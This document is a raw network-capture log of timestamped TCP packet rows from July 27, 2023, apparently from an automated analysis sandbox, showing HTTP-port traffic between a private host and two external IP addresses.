Jul 27, 2023 20:19:23.694087982 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694113016 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694138050 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694159985 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.694161892 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694185972 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694185972 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.694211960 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694221020 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.694236994 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694261074 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694278955 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.694283962 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694308996 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694320917 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.694334030 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694359064 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694384098 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694394112 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.694432020 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.694859982 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694886923 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694911003 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694932938 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.694936037 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.694961071 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695007086 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695013046 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695031881 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695055962 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695060968 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695080996 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695099115 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695103884 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695137978 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695149899 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695174932 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695198059 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695225000 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695233107 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695249081 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695261002 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695341110 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695367098 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695391893 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695400000 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695415974 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695424080 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695440054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695463896 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695482016 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695487976 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695542097 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695709944 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695777893 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695802927 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695826054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695831060 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695852041 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695874929 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695911884 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.695959091 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.695960999 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.696068048 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.696094036 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.696119070 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.696119070 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.696144104 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.696162939 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.700903893 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.700933933 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.700977087 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.701021910 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.701076031 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.702069998 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702096939 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702125072 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702145100 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.702150106 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702176094 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702195883 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.702250004 CEST	49771	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.702286005 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702331066 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.702578068 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702603102 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702627897 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702647924 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.702651978 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702670097 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702688932 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.702714920 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702750921 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.702756882 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702781916 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702805996 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702828884 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702847958 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.702852964 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702877045 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702896118 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.702900887 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702917099 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.702945948 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702969074 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702991962 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.702992916 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703016043 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703030109 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703038931 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703099966 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703134060 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703330040 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703375101 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703392982 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703398943 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703423977 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703447104 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703449011 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703486919 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703490019 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703514099 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703536987 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703560114 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703573942 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703600883 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703609943 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703660965 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703685045 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703706980 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703722000 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703754902 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703814983 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703860998 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703885078 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703910112 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703918934 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703933001 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.703953981 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.703990936 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704015017 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704025984 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704039097 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704063892 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704098940 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704145908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704168081 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704180956 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704190969 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704215050 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704229116 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704240084 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704274893 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704276085 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704301119 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704324007 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704360008 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704504967 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704529047 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704543114 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704567909 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704592943 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704617023 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704632044 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704641104 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704663992 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704684019 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704720020 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704726934 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704797029 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704821110 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704844952 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704859018 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704869986 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704890966 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.704953909 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704989910 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.704989910 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.705079079 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705105066 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705137014 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705147028 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.705162048 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705183029 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.705185890 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705216885 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.705261946 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705286026 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705327988 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.705542088 CEST	49772	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:23.705739021 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705764055 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705786943 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705811024 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705816031 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.705835104 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705857038 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.705858946 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705883026 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705907106 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705918074 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.705931902 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705952883 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.705954075 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705977917 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.705986023 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.706001997 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.706024885 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.706037998 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.706048012 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.706072092 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.706093073 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.706106901 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.706142902 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.722630978 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.722661972 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.722681999 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.722784996 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.723825932 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.723846912 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.723893881 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724011898 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724061966 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724088907 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724107027 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724113941 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724138975 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724144936 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724164009 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724188089 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724198103 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724211931 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724217892 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724236012 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724268913 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724296093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724306107 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724320889 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724334955 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724344015 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724368095 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724392891 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724400043 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724416971 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724431038 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724441051 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724463940 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724488974 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724495888 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724513054 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724519014 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724539042 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724562883 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724587917 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724602938 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724611998 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724634886 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724643946 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724658966 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724682093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724683046 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724705935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724721909 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724729061 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724751949 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724775076 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724776030 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724801064 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724817038 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724823952 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724858999 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724874020 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724898100 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724920988 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724945068 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724963903 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.724968910 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.724988937 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725003958 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725013018 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725028038 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725037098 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725061893 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725076914 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725085020 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725107908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725132942 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725133896 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725157976 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725172997 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725181103 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725205898 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725229979 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725244999 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725254059 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725276947 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725281954 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725301027 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725317001 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725326061 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725347996 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725373030 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725378990 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725395918 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725403070 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725419998 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725442886 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725466967 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725474119 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725490093 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725501060 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725513935 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725538015 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725563049 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725569010 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725586891 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725594997 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725610971 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725635052 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725657940 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725670099 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725682020 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725696087 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725704908 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725728989 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725752115 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725775003 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725781918 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725797892 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725821972 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725825071 CEST	49770	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:19:23.725846052 CEST	80	49770	188.114.96.7	192.168.2.4
Jul 27, 2023 20:19:23.725847006 CEST	49770	80	192.168.2.4	188.114.96.7
